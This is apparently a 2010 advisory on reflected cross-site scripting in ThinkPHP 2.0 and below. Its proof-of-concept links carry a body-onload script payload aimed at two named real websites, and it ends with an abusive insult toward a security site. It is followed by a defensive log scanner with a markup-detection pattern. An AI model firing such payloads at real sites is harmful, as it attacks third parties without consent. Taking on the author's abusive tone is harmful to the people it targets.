ThinkPHP versions 2.0 and below suffer from cross-site scripting vulnerabilities.
a7208e5112a62b9ed7872de827624e94648b6e690b6581cc22685d4380ec8629
# Title: ThinkPHP <= 2.0 XSS Vulnerability
# Date: 9/2/2010
# Author: zx
# Software Link: http://www.thinkphp.cn/Down/
# Version: <= 2.0
# Tested on: IE6/7 & Firefox
XSS Vulnerability:
Test Link:
ThinkPHP 2.0 http://game.baofeng.com/ucenter/index.php?s=1%3Cbody+onload=alert(1)%3E
ThinkPHP 1.5 http://ask.lenovo.com.cn/index.php?s=1%3Cbody+onload=alert(1)%3E
# zx_at_bbs.!ntra.sd*.c0m
# Finally,Fuck you ->Securitylab.ir<- the truly thief of Iran!! Spring Brother will blast ur Ass!!!
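
The test links above carry markup in the `s` query parameter of `index.php`. As an added example (not part of the original advisory), this Python check scans web access logs for requests whose `s` value decodes to a tag opener or inline event handler, including double-encoded input. The log lines are constructed, and the function names and the markup pattern are assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed access-log lines; IPs, dates and sizes are placeholders.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:01:12 +0000] "GET /index.php?s=1%3Cbody+onload=alert(1)%3E HTTP/1.1" 200 5120',
    '203.0.113.8 - - [01/Jan/2024:10:02:40 +0000] "GET /index.php?s=/Index/index HTTP/1.1" 200 4096',
    '203.0.113.9 - - [01/Jan/2024:10:03:05 +0000] "GET /index.php?s=1%253Cbody%2Bonload%3Dalert(1)%253E HTTP/1.1" 200 5120',
    '203.0.113.10 - - [01/Jan/2024:10:04:00 +0000] "GET /index.php?m=Index&a=list&page=2 HTTP/1.1" 200 2048',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Markup that has no place in a routing parameter: a tag opener or an
# inline event handler (assumed pattern, tune for your application).
MARKUP_RE = re.compile(r'<\s*[a-z!/]|\bon[a-z]+\s*=', re.IGNORECASE)


def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input is normalised too."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def flag_reflected_markup(lines, param="s"):
    """Return (client_ip, decoded_value) for requests whose `param` carries markup."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a request line we understand
        query = urlsplit(match.group(1)).query
        # parse_qs performs the first round of percent-decoding itself.
        for raw in parse_qs(query, keep_blank_values=True).get(param, []):
            value = decode_fully(raw)
            if MARKUP_RE.search(value):
                hits.append((line.split()[0], value))
    return hits


if __name__ == "__main__":
    for ip, value in flag_reflected_markup(SAMPLE_LOG):
        print(ip, repr(value))
```

A hit shows that a request attempted to inject markup, not that the response reflected it; confirm against the application's output encoding for the `s` value.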